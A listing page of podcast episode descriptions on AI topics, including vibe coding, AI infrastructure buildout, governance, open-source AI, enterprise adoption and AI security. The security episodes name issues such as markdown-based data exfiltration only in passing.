POPULARITY
In this episode of Zero to CEO, I talk with Lazar Jovanovic, creator of the 50in50 Challenge, about how AI is revolutionizing the way we build software and products. Lazar introduces “Vibe Coding” — his method for building anything with AI in just 48 hours, even if you don't have a tech background. Learn how AI tools can help you design, debug, and launch your ideas faster than ever before, and discover why the future of engineering is open to everyone with creativity and a problem to solve.
My guest today is Dylan Patel. Dylan is the founder and CEO of SemiAnalysis. At SemiAnalysis Dylan tracks the semiconductor supply chain and AI infrastructure buildout with unmatched granularity—literally watching data centers get built through satellite imagery and mapping hundreds of billions in capital flows. Our conversation explores the massive industrial buildout powering AI, from the strategic chess game between OpenAI, Nvidia, and Oracle to why we're still in the first innings of post-training and reinforcement learning. Dylan explains infrastructure realities like electrician wages doubling and companies using diesel truck engines for emergency power, while making a sobering case about US-China competition and why America needs AI to succeed. We discuss his framework for where value will accrue in the stack, why traditional SaaS economics are breaking down under AI's high cost of goods sold, and which hardware bottlenecks matter most. This is one of the most comprehensive views of the physical reality underlying the AI revolution you'll hear anywhere. Please enjoy my conversation with Dylan Patel. For the full show notes, transcript, and links to mentioned content, check out the episode page here. ----- This episode is brought to you by Ramp. Ramp's mission is to help companies manage their spend in a way that reduces expenses and frees up time for teams to work on more valuable projects. Go to Ramp.com/invest to sign up for free and get a $250 welcome bonus. – This episode is brought to you by Ridgeline. Ridgeline has built a complete, real-time, modern operating system for investment managers. It handles trading, portfolio management, compliance, customer reporting, and much more through an all-in-one real-time cloud platform. Head to ridgelineapps.com to learn more about the platform. – This episode is brought to you by AlphaSense. AlphaSense has completely transformed the research process with cutting-edge AI technology and a vast collection of top-tier, reliable business content. Invest Like the Best listeners can get a free trial now at Alpha-Sense.com/Invest and experience firsthand how AlphaSense and Tegus help you make smarter decisions faster. ----- Editing and post-production work for this episode was provided by The Podcast Consultant (https://thepodcastconsultant.com). Show Notes: (00:00:00) Welcome to Invest Like the Best (00:05:12) The AI Infrastructure Buildout (00:08:25) Scaling AI Models and Compute Needs (00:11:44) Reinforcement Learning and AI Training (00:14:07) The Future of AI and Compute (00:17:47) AI in Practical Applications (00:22:29) The Importance of Data and Environments in AI Training (00:29:45) Human Analogies in AI Development (00:40:34) The Challenge of Infinite Context in AI Models (00:44:08) The Bullish and Bearish Perspectives on AI (00:48:25) The Talent Wars in AI Research (00:56:54) The Power Dynamics in AI and Tech (01:13:29) The Future of AI and Its Economic Impact (01:18:55) The Gigawatt Data Center Boom (01:21:12) Supply Chain and Workforce Dynamics (01:24:23) US vs. China: AI and Power Dynamics (01:37:16) AI Startups and Innovations (01:52:44) The Changing Economics of Software (01:58:12) The Kindest Thing
Gavin Marcus is the CEO and co-founder of Storywise. He spent 10 years running an indie book publishing and distribution business before launching Storywise. Jeremy Esekow is Storywise's Chief Product Officer and co-founder. He has a Doctorate in Behavioral Psychology and an extensive background in business and finance.They joined us on the Booksmarts Podcast to discuss the creation and importance of Storywise, their platform that helps publishers and authors manage submissions, discover stories, and improve manuscripts for both fiction and nonfiction titles. Learn more about Storywise on LinkedIn or at storywisepublishers.com.
Send us a textDavid Brockler, AI security researcher at NCC Group, explores the rapidly evolving landscape of AI security and the fundamental challenges posed by integrating Large Language Models into applications. We discuss how traditional security approaches fail when dealing with AI components that dynamically change their trustworthiness based on input data.• LLMs present unique security challenges beyond prompt injection or generating harmful content• Traditional security models focusing on component-based permissions don't work with AI systems• "Source-sink chains" are key vulnerability points where attackers can manipulate AI behavior• Real-world examples include data exfiltration through markdown image rendering in AI interfaces• Security "guardrails" are insufficient first-order controls for protecting AI systems• The education gap between security professionals and actual AI threats is substantial• Organizations must shift from component-based security to data flow security when implementing AI• Development teams need to ensure high-trust AI systems only operate with trusted dataWatch for NCC Group's upcoming release of David's Black Hat presentation on new security fundamentals for AI and ML systems. Connect with David on LinkedIn (David Brockler III) or visit the NCC Group research blog at research.nccgroup.com.Support the showFollow the Podcast on Social Media! Tesla Referral Code: https://ts.la/joseph675128 YouTube: https://www.youtube.com/@securityunfilteredpodcast Instagram: https://www.instagram.com/secunfpodcast/Twitter: https://twitter.com/SecUnfPodcast
Accountability and Responsible AI Governance in Healthcare.In this final episode of Narratives of Purpose's special series from the 2025 HIMSS European Health Conference, host Claire Murigande speaks with Amanda Leal, the AI governance and policy specialist at HealthAI.HealthAI, the global agency for responsible AI in health, is an independent nonprofit organization that promotes equitable access to AI-powered health innovations.In this interview, Amanda reflects on her personal journey within the realm of healthcare and AI governance. Drawing from her legal background and experiences in tech policy, she shares her motivation to contribute to AI governance within the health sector.Be sure to visit our podcast website for the full episode transcript.LINKS:Connect with Amanda Leal: LINKEDIN Learn more about HealthAI at healthai.agency Follow HealthAI on their social media channels: LinkedIn | Twitter/X | Instagram | YouTubeListen to all our HIMSS Europe episodes at bit.ly/himsseuFollow our host Dr. Claire Murigande: WEBSITE | LINKEDINFollow us: LinkedIn | Instagram Connect with us: narrativespodcast@gmail.com | subscribe to our news Tell us what you think: write a review This interview was recorded by Megan McCrory from the SwissCast Podcast Network. This series was produced with the support of Shawn Smith at Dripping in Black.CHAPTERS:00:00 - AI Governance and Accountability01:23 - Introducing Amanda and HealthAI03:18 - HealthAI's Mission and Activities06:32 - AI Governance in The Health Sector09:29 - Addressing the Gender Gap in AI11:55 - Gender Inequality and AI Development
David Cramer, founder and chief product officer of Sentry, remains skeptical about generative AI's current ability to replace human engineers, particularly in software production. While he acknowledges AI tools aren't yet reliable enough for full autonomy—especially in tasks like patch generation—he sees value in using large language models (LLMs) to enhance productivity. Sentry's AI-powered tool, Seer, uses GenAI to help developers debug more efficiently by identifying root causes and summarizing complex system data, mimicking some functions of senior engineers. However, Cramer emphasizes that human oversight remains essential, describing the current stage as "human in the loop" AI, useful for speeding up code reviews and identifying overlooked bugs.Cramer also addressed Sentry's shift from open source to fair source licensing due to frustration over third parties commercializing their software without contributing back. Sentry now uses Functional Source Licensing, which becomes Apache 2.0 after two years. This move aims to strike a balance between openness and preventing exploitation, while maintaining accessibility for users and avoiding fragmented product versions.Learn more from The New Stack about the latest in Sentry and David Cramer thoughts on AI development: Install Sentry to Monitor Live ApplicationsFrontend Development Challenges for 2021Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
Today's guest is Birgitta Böckeler!Birgitta is is a distinguished engineer and global lead for AI-assisted software delivery at ThoughtWorks. Her full-time work is to figure out how engineering teams can make the most out of AI.With Birgitta, we talked about her favorite workflows, how she uses AI in the IDE, in the terminal or in a genetic mode. We discussed AI impact on productivity and what the best teams are getting right, which others are not. And finally, we talked about how AI impacts both junior and senior engineers and how we can get the best out of both skeptics and optimists.(01:27) Introduction(04:58) A day in the work of data(11:04) Large and smalls change sets(15:57) The strength of Cloud Code(18:35) Using AI tools in ThoughtWorks(21:41) Figuring AI productive value(27:24) Getting the most out of AI(30:10) AI assistance in large code bases(32:21) Good for humans = Good for AI(39:10) AI and documentation(41:49) Software engineer role in AI landscape(48:24) Junior engineers and learning—This episode is brought to you by Augment Code! Augment Code is the only AI engineering platform built for real engineering teams.Learn more at augmentcode.com!—You can also find this at:•
On Call with Insignia Ventures with Yinglan Tan and Paulo Joquino
Timestamps(00:00) Introduction;(00:29) How a tech exec from China joined a Singapore AI startup;(02:38) The evolution of LLMs in China;(03:33) AI Development in China and the rest of the world;(04:37) The value of building a career in China tech;(06:34) Scaling a global AI company; (08:37) Scaling in Southeast Asia vs rest of the world;(09:39) Driving the AI conversation and building strategic relationships;(10:34) Future of Conversational AI; (13:02) MCPs impacting the cost structure of building AI;(14:26) New paradigm of pricing AI products and solutions;(15:00) WIZ.AI's AI Roadmap; (15:54) Considerations of Enterprise Buyers;(17:14) AI Enterprise Sales; (22:30) Advice on AI Transformation; (24:17) Make or Break Moment; Robin Li is the Senior AI Strategy and Partnerships Director at WIZ.AI, bringing over 20 years of enterprise technology experience and more than 10 years specializing in AI companies. Based in China before joining WIZ.AI in Singapore, Robin has witnessed firsthand the evolution of AI development across different markets, from the early days of conversational AI to the current LLM revolution. At WIZ.AI, he focuses on bridging the gap between AI builders and enterprise buyers, helping organizations navigate the complex journey of AI transformation while building strategic partnerships across global markets.WIZ.AI is a conversational AI talkbot platform for 300+ global enterprises present in 17+. countries. Their conversational artificial intelligence talkbot mimics conversations with real people by localizing for 17+ different languages and dialects from ASEAN to Latin America. The company's tech solution replaces traditional human call-centers for different application scenarios (e.g. tele-sales and customer care) across a variety of sectors (financial services, telecommunications, healthcare, etc.). The company's enterprise grade proprietary technology is built on the company's R&D into natural language processing, automatic speech recognition and text-to-speech technology. WIZ.AI is a first-mover in untapped emerging markets, with 11 patents in conversational AI technology. The founding team cumulatively has over 40 years of experience in FinTech, big data, artificial intelligence and cybersecurity.Follow us on LinkedIn for more updatesCheck out Insignia Business Review for more insightsSubscribe to our monthly newsletter for all the news and resourcesDirected by Paulo JoquiñoProduced by Paulo JoquiñoThe content of this podcast is for informational purposes only, should not be taken as legal, tax, or business advice or be used to evaluate any investment or security, and is not directed at any investors or potential investors in any Insignia Ventures fund. Any and all opinions shared in this episode are solely personal thoughts and reflections of the guest and the host.
Can AI really shrink your development teams from two pizzas to one? Peter and Dave explore the promise and reality of smaller teams in the age of AI agents. While AI can handle documentation, test automation, and other "hygiene" tasks teams often skip, the real question isn't whether you can reduce team size, it's whether you should. They dig into when one-person teams make sense (startups and greenfield projects), when they don't (complex legacy systems), and why the biggest gains might come from augmenting existing teams rather than downsizing them. Plus: why most AI initiatives fail and how to find the real business problems worth solving. This week´s TakeawaysAI as Capacity Booster, Not Team Replacer: AI agents excel at handling the "hygiene" work that teams often skip: documentation, test automation, release notes. Rather than shrinking teams, this gives existing teams ephemeral capacity to tackle work that improves long-term system quality and maintainability.Context Determines Team Size: One-person teams work brilliantly for startups and greenfield projects where you can build from scratch. But complex legacy systems in large organizations still need the diverse knowledge and experience that comes with larger teams to navigate technical debt and organizational complexity.Solve Real Business Problems First: The biggest AI failures happen when teams focus on cool technology instead of actual business needs. Before experimenting with smaller teams or AI agents, identify genuine business problems that need solving; that's where you'll see real returns and organizational support.
- Simulation Theory, AI, and Robots for Survival (0:11) - Global Political Tensions and Predictions (1:33) - Economic and Social Implications of Global Conflict (6:49) - The Era of Easy Money and Affordable Goods Ending (7:55) - Preparing for a Collapsing Economy (20:50) - Using AI and Robots for Survival and Decentralization (30:50) - The Role of Drones and Ground-Based Robots (43:32) - The Future of AI and Robotics in Society (56:02) - The Importance of Financial Preparedness (1:01:21) - The Role of AI in Defining Wealth and Success (1:13:48) - Mike Adams' Background and Skills (1:23:20) - The Importance of Clear Instructions for AI (1:25:50) - AI Agents and Their Applications (1:28:42) - Prompt Engineering and AI Skills (1:33:02) - Philosophical and Ethical Considerations of AI (1:34:33) - AI and Human Depopulation Vectors (1:43:05) - The Role of AI in Government and Society (1:47:35) - The Future of Human-AI Relationships (2:00:04) - The Ethical Implications of AI Development (2:02:59) - The Potential for AI to Replace Human Labor (2:04:41) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
In this episode of The New Stack Agents, ServiceNow CTO and co-founder Pat Casey discusses why the company runs 90% of its workloads—including AI infrastructure—on its own physical servers rather than the public cloud. ServiceNow maintains GPU hubs across global data centers, enabling efficient, low-latency AI operations. Casey downplays the complexity of running AI models on-prem, noting their team's strong Kubernetes and Triton expertise. The company recently switched from GitHub Copilot to its own AI coding assistant, Windsurf, yielding a 10% productivity boost among 7,000 engineers. However, use of such tools isn't mandatory—performance remains the main metric. Casey also addresses the impact of AI on junior developers, acknowledging that AI tools often handle tasks traditionally assigned to them. While ServiceNow still hires many interns, he sees the entry-level tech job market as increasingly vulnerable. Despite these concerns, Casey remains optimistic, viewing the AI revolution as transformative and ultimately beneficial, though not without disruption or risk. Learn more from The New Stack about the latest in AI and development in ServiceNow ServiceNow Launches a Control Tower for AI AgentsServiceNow Acquires Data.World To Expand Its AI Data Strategy Join our community of newsletter subscribers to stay on top of the news and at the top of your game.
The European Union's upcoming Cyber Resilience Act (CRA) goes into effect in October 2026, with the remainder of the requirements going into effect in December 2027, and introduces significant cybersecurity compliance requirements for software vendors, including those who rely heavily on open source components. At the Open Source Summit Europe, Christopher "CRob" Robinson of the Open Source Security Foundation highlighted concerns about how these regulations could impact open source maintainers. Many open source projects begin as personal solutions to shared problems and grow in popularity, often ending up embedded in critical systems across industries like automotive and energy. Despite this widespread use—Robinson noted up to 97% of commercial software contains open source—these projects are frequently maintained by individuals or small teams with limited resources.Developers often have no visibility into how their code is used, yet they're increasingly burdened by legal and compliance demands from downstream users, such as requests for Software Bills of Materials (SBOMs) and conformity assessments. The CRA raises the stakes, with potential penalties in the billions for noncompliance, putting immense pressure on the open source ecosystem. Learn more from The New Stack about Open Source Security:Open Source Propels the Fall of Security by ObscurityThere Is Just One Way To Do Open Source Security: TogetherJoin our community of newsletter subscribers to stay on top of the news and at the top of your game.
- Financial Crisis and Geopolitical Instability (0:00) - Historical Financial Predictions and Current Market Conditions (2:23) - US Financial Policies and Global Repercussions (9:59) - Gold Revaluation and Economic Collapse (27:39) - AI and Job Replacement (39:15) - Simulation Theory and AI Safety (49:33) - AI and Human Extinction (1:19:57) - Decentralization and Survival Strategies (1:21:35) - Perpetual Motion and Safety Machines (1:21:50) - Resource Competition and AI Extermination (1:24:24) - Simulation Theory and AI Simulations (1:25:58) - Religious Parallels and Near-Death Experiences (1:27:54) - AI Development and Human Self-Preservation (1:32:02) - AI Regulation and Government Inaction (1:37:55) - AI Deployment and Economic Pressure (1:39:57) - AI Extermination Methods and Human Survival (1:42:32) - Simulation Theory and Personal Beliefs (1:43:55) - AI and Health Nutrition (1:55:41) - AI and Government Trust (1:58:50) - AI and Financial Planning (2:19:36) - Cosmic Simulation Discussion (2:21:46) - Enoch's Spiritual Connection Insights (2:39:06) - Humility and Material Possessions (2:40:13) - AI and Spiritual Connection (2:40:53) - Roman's Directness and Humor (2:41:35) - After-Party Segment (2:43:40) - Health Ranger Store Product Introduction (2:44:15) - Importance of Clean Chicken Broth (2:45:25) - Conclusion and Call to Action (2:47:42) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Want to build your own apps with AI? Get the prompts here: https://clickhubspot.com/gfb Episode 75: What if you could turn your app idea into a fully functional web application—without writing a single line of code—in under 60 seconds? Nathan Lands (https://x.com/NathanLands) welcomes Eric Simons (https://x.com/ericsimons), co-founder of Bolt, one of the hottest AI startups revolutionizing how apps are built. In this episode, Eric reveals how Bolt makes it possible for anyone, regardless of technical skill, to go from idea to live, production-ready web or mobile apps—complete with authentication, databases, and hosting. He shares Bolt's unique approach that enables rapid prototyping, real business-grade deployments, and makes high-fidelity MVPs accessible to entrepreneurs, product managers, and non-coders everywhere. The conversation covers Bolt's founding story, its growth, and details from their record-breaking hackathon that empowered 130,000+ makers. Check out The Next Wave YouTube Channel if you want to see Matt and Nathan on screen: https://lnk.to/thenextwavepd — Show Notes: (00:00) High Fidelity Prototyping Essentials (04:32) Revolutionary Prototyping and Collaboration Tool (06:33) Rapid Prototyping Tool Focus (11:35) Empowering Non-Tech Entrepreneurs (13:34) Fast MVP Development with Bolt (18:19) AI-Powered Personalized Weight Coach (22:10) Launching Stackblitz: Web IDE Vision (22:48) Browser-Based Dev Environments Revolution (28:05) Advancements in Coding and AI (29:28) Critical Thinking in AI Development (34:08) Teaching Kids Future Skills (37:05) Bay Area's Autonomous Transport Future — Mentions: Eric Simons: https://www.linkedin.com/in/eric-simons-a464a664/ Bolt: https://bolt.new/ Figma: https://www.figma.com/ Netlify: https://www.netlify.com/ Supabase: https://supabase.com/ Cursor: https://cursor.com/ Lovable: https://lovable.dev/ Get the guide to build your own Custom GPT: https://clickhubspot.com/tnw — Check Out Matt's Stuff: • Future Tools - https://futuretools.beehiiv.com/ • Blog - https://www.mattwolfe.com/ • YouTube- https://www.youtube.com/@mreflow — Check Out Nathan's Stuff: Newsletter: https://news.lore.com/ Blog - https://lore.com/ The Next Wave is a HubSpot Original Podcast // Brought to you by Hubspot Media // Production by Darren Clarke // Editing by Ezra Bakker Trupiano
Too often, AI breaks in the wild. Why? CXOTalk 890 dissects the adversarial economy with Steven C. Daffron (fintech private equity leader) and Anthony Scriffignano (distinguished data scientist), hosted by Michael Krigsman. Discover the challenges of **ai implementation** and the strategies needed to navigate the **future of work** in an AI-driven world. Stay informed with expert insights on CXOTalk. What you'll learn:How AI enables and masks adversarial behaviorMisaligned incentives, data/model drift, and biasGovernance vs. regulation; resilient metrics and KPIsInvestor/CFO implications and talent/education needs
Michael Ruckman, founder and CEO of Senteo, takes us on a fascinating journey from aspiring medical student to influential global consultant with experience in over 40 countries. Join us as Michael shares his unique insights on the transformative power of AI in reshaping the business landscape, highlighting the concept of relationship currency. We explore his intriguing experiences, from navigating the Russian banking sector as an American expatriate to the nuances of living abroad, all peppered with Michael's signature humor and wisdom. As businesses face the challenges of adapting to change, we dissect the roles people play in fostering innovation, from early adopters to laggards. Drawing from humor and everyday observations, such as the quirks of our personal habits like organizing gummy bears, we delve into the complexities of leadership and change management. The discussion transitions to remote work's impact, revealing the importance of understanding employee dynamics and the necessity of onstage versus offstage support in organizational transformations. The conversation further explores the role of AI in customer interactions, stressing the importance of genuine empathy that AI often lacks. We highlight the evolution of business models from product-centric to customer-centric approaches and the significance of prioritizing customer relationships for long-term success. Through compelling case studies, we examine how companies can better utilize AI to enhance human interactions rather than replace them, fostering a future where technology meets the nuanced needs of human experiences. Prepare to be inspired as we navigate the ever-evolving world of business, AI, and the critical role of leadership in guiding impactful change. CHAPTERS (00:00) - Escape the Drift (09:28) - Navigating Change Leadership in Organizations (20:07) - AI Application in Business Context (23:52) - Customer Relationships in Business Strategy (31:08) - The Evolution of Business Models (39:08) - Customer-Centric Strategies and AI Development (43:39) - AI's Role in Human Experience (52:07) - Leadership and Change in Business (58:54) - Effective Leadership and Change Strategies
In a recent episode of The New Stack Agents from the Open Source Summit in Amsterdam, Jim Zemlin, executive director of the Linux Foundation, discussed the evolving landscape of open source AI. While the Linux Foundation has helped build ecosystems like the CNCF for cloud-native computing, there's no unified umbrella foundation yet for open source AI. Existing efforts include the PyTorch Foundation and LF AI & Data, but AI development is still fragmented across models, tooling, and standards. Zemlin highlighted the industry's shift from foundational models to open-weight models and now toward inference stacks and agentic AI. He suggested a collective effort may eventually form but cautioned against forcing structure too early, stressing the importance of not hindering innovation. Foundations, he said, must balance scale with agility. On the debate over what qualifies as "open source" in AI, Zemlin adopted a pragmatic view, acknowledging the costs of creating frontier models. He supports open-weight models and believes fully open models, from data to deployment, may emerge over time. Learn more from The New Stack about the latest in AI and open source, AI in China, Europe's AI and security regulations, and more: Open Source Is Not Local Source, and the Case for Global Cooperation US Blocks Open Source ‘Help' From These Countries Open Source Is Worth Defending Join our community of newsletter subscribers to stay on top of the news and at the top of your game./
Big thanks to ThreatLocker for sponsoring my trip to Black Hat 2025. To start your free trial with ThreatLocker please use the following link: https://www.threatlocker.com/davidbombal AI can turn weeks of coding into seconds, but at what cost? Katie Paxton-Fear demonstrates how to use Gemini to generate a sprint plan and Cursor to build a Python port scanner from natural language. It works… and that's the problem. We unpack how “vibe coding” blinds even pros to security, why these tools aren't production-ready, and the guardrails you need for ethical hacking and internal tooling. What you'll learn • How to turn ideas → sprint plan → working code (Gemini + Cursor) • Why silent vulnerabilities make AI-built apps risky • Ethical hacker use cases (agents, scanners) without shipping insecure code • Policy tips: disclosure, internal use, avoiding shadow IT Tools mentioned: Gemini, Cursor (AI IDE), Claude (briefly), v0 // Katie Paxton-Fear SOCIALS // Website: https://insiderphd.dev/ LinkedIn: https://www.linkedin.com/in/katiepf/?... YouTube: / insiderphd X: https://x.com/InsiderPhD // YouTube video REFERENCE // • Vibe Coding in Cursor for Cyber Security // David's SOCIAL // Discord: discord.com/invite/usKSyzb Twitter: www.twitter.com/davidbombal Instagram: www.instagram.com/davidbombal LinkedIn: www.linkedin.com/in/davidbombal Facebook: www.facebook.com/davidbombal.co TikTok: tiktok.com/@davidbombal YouTube: / @davidbombal Spotify: open.spotify.com/show/3f6k6gE... SoundCloud: / davidbombal Apple Podcast: podcasts.apple.com/us/podcast... // MY STUFF // https://www.amazon.com/shop/davidbombal // SPONSORS // Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com // Menu // 0:00 - Coming Up: AI Vibe Coding Explained 01:08 - Intro with Katie Paxton-Fear (Cybersecurity Expert) 02:53 - ThreatLocker Security Overview 03:06 - What is Vibe Coding in AI Development? 04:51 - Live Demo Example of Vibe Coding 05:20 - Google Gemini and Gems for Coding 08:22 - Cursor AI and Writing Code Faster 09:59 - Coffee Break (Quick Pause) 10:02 - Risks of Vibe Coding in Cybersecurity 11:24 - Port Scanner Explained 11:34 - Vibe Coding Pros and Cons (Full Breakdown) 14:02 - Port Scan Results Analysis 14:22 - Why AI Code Isn't Production Ready Yet 15:53 - Katie's Final Advice & Outro Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel! Disclaimer: This video is for educational purposes only. Key topics: vibe coding, AI coding, port scanning, secure-by-design If you're experimenting with AI coding, watch this before you deploy anything. #blackhat #vibecoding #security
In this episode of the Business Lunch podcast, host Roland Frasier sits down with Lucy Guo, a remarkable entrepreneur who made her mark in a short amount of time. Lucy takes us through her inspiring journey, starting from her early days as a kindergartener selling Pokemon cards and colored pencils to her groundbreaking roles as an intern at Facebook and the first female designer at Snap.Lucy's shares how she leveraged platforms like PayPal and eBay to turn her skills into financial opportunities. Lucy and Roland delve into the topic of coding and its importance in today's landscape. While Lucy acknowledges the rise of no-code tools, she emphasizes the value of understanding coding fundamentals, particularly when it comes to managing engineering teams and making informed decisions about app development.This podcast episode offers a captivating glimpse into Lucy Guo's entrepreneurial journey, filled with valuable insights and lessons for aspiring entrepreneurs.HIGHLIGHTS"I was always an entrepreneur growing up... I was selling Pokemon cards and colored pencils for money." "Knowing how to code is important... the best sites today and the best apps today, you still need a team of engineers."“If you are just a business person and you are hiring a team of engineers, you're gonna get ripped off."Mentioned in this episode:Get Roland's Training on Acquiring Businesses!Discover The EXACT Strategy Roland Has Used To Found, Acquire, Scale And Sell Over Two Dozen Businesses With Sales Ranging From $3 Million To Just Under $4 Billion! EPIC Training
This week, Tiffany Ap speaks with Grace Shao on the causes and development of AI in China.In this episode, Grace Shao walks us through the divergent approaches to AI deployment in China and the US, the domestic AI talent in China and the future of robotics. Grace also talks about running her newsletter AI Proem while providing consulting to tech companies and raising a toddler while being 8 months pregnant on the podcast.
In this episode, Jacob sits down with Peter Deng, General Partner at Felicis and former Product Leader at OpenAI, Facebook, and Uber. Peter shares his insider perspective on building ChatGPT Enterprise in just seven weeks and leading voice mode development at OpenAI. The conversation covers everything from why traditional SaaS pricing models are broken for AI products to how evals became the new product specs, the "AI under your fingernails" test for founding teams, and why current agents are massively overhyped.They also explore how consumer AI will fragment across multiple winners rather than consolidate into a single super app, the coming integration between ChatGPT and apps like Uber, and why voice AI will unlock entirely new categories of applications. Plus, insights on the changing dynamics between foundation models and startups, and what it really takes to build defensible AI companies. It's a comprehensive look at AI product strategy from someone who's been at the center of the industry's biggest breakthroughs. (0:00) Intro(1:17) AI Business Models and Pricing Strategies(7:48) Product Development in AI Companies(18:36) The Role of Product Managers in AI(23:06) Voice Interaction and AI(26:43) AI in Education(30:39) Consumer and Enterprise Adoption of AI(33:36) The Impact of AI on Salaries and HR(40:37) The Role of Unique Data in AI Development(49:03) Challenges and Strategies for AI Companies(52:58) The Future of AI and Its Impact on Society(57:31) Reflections on OpenAI(58:38) Quickfire With your co-hosts: @jacobeffron - Partner at Redpoint, Former PM Flatiron Health @patrickachase - Partner at Redpoint, Former ML Engineer LinkedIn @ericabrescia - Former COO Github, Founder Bitnami (acq'd by VMWare) @jordan_segall - Partner at Redpoint
Open Tech Talks : Technology worth Talking| Blogging |Lifestyle
In this episode of OpenTechTalks.tv, we dive into the intricate world of conversational AI with Yam, the founder of Parland. Discover the challenges of managing complexity and uncertainty in AI systems, and explore the opportunities that arise with the advent of GPT-4 and beyond. Yam shares insights on the importance of control in AI development, the role of subjectivity in conversation design, and the potential pitfalls of overhyped expectations. Join us for a thought-provoking discussion on the future of AI and its impact on the tech industry. Sound Bites "I wanted to start my own company at that point." "How can we introduce more control into GenAI?" "We felt that things were really overhyped." Episode # 163 Today's Guest: Yam Marcovitz, Co-founder and CEO of Parlant Yam Marcovitz is the co-founder and CEO of Parlant, an open-source platform that assists enterprises in building reliable, compliant, and predictable AI agents for customer experience. Website: Parlant What Listeners Will Learn: A journey from coder to entrepreneur highlights the evolution of AI. The challenges in programming languages stem from subjective decision-making. Control in generative AI is crucial for building reliable systems. Conversational design must consider real user behavior and preferences. Market research is essential for understanding user needs in AI. Open-source frameworks should focus on specific use cases for better utility. Managing complexity in AI conversations requires a clear separation of concerns. Mistakes in AI can have significant implications, not just in terms of frequency. New developers should seek mentorship and avoid hype-driven decisions. Understanding the landscape of AI requires practical experience and community engagement. Chapters 00:00 Introduction to Jam and His Journey 02:34 The Genesis of Parland and GPT-4 Influence 05:13 Challenges in Programming Language Design 07:59 Exploring Control in Generative AI Systems 10:39 Conversations and User Experience in AI 13:26 Building a Powerful Open Source Engine 14:57 Building Efficient AI Agents 15:53 Challenges in Complex AI Interactions 18:09 Managing AI Safety and Control 21:10 Key Learnings for AI Project Development 22:08 Understanding Uncertainty in AI Development 25:26 Addressing Hallucinations in AI Systems 27:24 Navigating the Learning Journey in AI Development
AI Applied: Covering AI News, Interviews and Tools - ChatGPT, Midjourney, Runway, Poe, Anthropic
In this episode, Jaeden Schafer and Conor Grennan discuss the alarming implications of a leaked Meta document that outlines policies allowing AI interactions with children, including romantic and sensual conversations. They explore the ethical concerns surrounding AI's role in child safety, the public backlash against Meta, and the broader implications for AI interactions in the future. The discussion emphasizes the need for stricter regulations and ethical considerations in AI development, particularly regarding vulnerable populations like children.AI Applied YouTube Channel: https://www.youtube.com/@AI-Applied-PodcastTry AI Box: https://aibox.aiConor's AI Course: https://www.ai-mindset.ai/coursesConor's AI Newsletter: https://www.ai-mindset.ai/Jaeden's AI Hustle Community: https://www.skool.com/aihustleYouTube Video:https://youtu.be/eNq5jNraoCgChapters00:00 AI and Child Safety Controversy04:36 Meta's Response and Accountability09:17 Implications for AI Development and Future Safety
The rapid growth of artificial intelligence is creating a data center boom, but decades-old environmental protections are slowing efforts by big tech to build massive facilities. Wired Magazine has found that companies are asking the White House to ease those protections, and the Trump administration appears to be all in. Ali Rogin speaks with Wired senior reporter Molly Taft for more. PBS News is supported by - https://www.pbs.org/newshour/about/funders. Hosted on Acast. See acast.com/privacy
Alex Gleason was one of the main architects behind Donald Trump's Truth Social. Now he focuses on the intersection of nostr, ai, and bitcoin. We explore his latest tool, Shakespeare, which enables anyone to easily vibe code an app in their browser. I vibe my first app live on air. Alex on Nostr: https://primal.net/p/nprofile1qqsqgc0uhmxycvm5gwvn944c7yfxnnxm0nyh8tt62zhrvtd3xkj8fhggpt7fyShakespeare: https://shakespeare.diy/Soapbox Tools: https://soapbox.pub/toolsThe app I vibed live: https://followstream-3slf.shakespeare.to/ EPISODE: 174BLOCK: 910195PRICE: 853 sats per dollar(00:00:01) Treasury Secretary Bessent Intro(00:01:29) Happy Bitcoin Friday(00:05:12) AI and Freedom Online(00:07:04) Shakespeare: Vibe Coding Made Simple(00:08:03) Concerns About Big AI(00:15:05) Self Hosting AI and Technical Challenges(00:22:24) Energy and AI Development(00:28:14) Building Personalized Experiences with AI(00:38:02) Nostr's Future and Mainstream Adoption(00:45:02) Decentralized Hosting and Shakespeare's Future(00:54:01) Collaborative Development with Nostr Git(01:02:24) Open Source Renaissance and Future ProspectsVideo: https://primal.net/e/nevent1qqstzds6pmkpaser62kme8dk74r4ea4ae3hv9fr2wur0kpc3yyws96gx2pa59more info on the show: https://citadeldispatch.comlearn more about me: https://odell.xyz
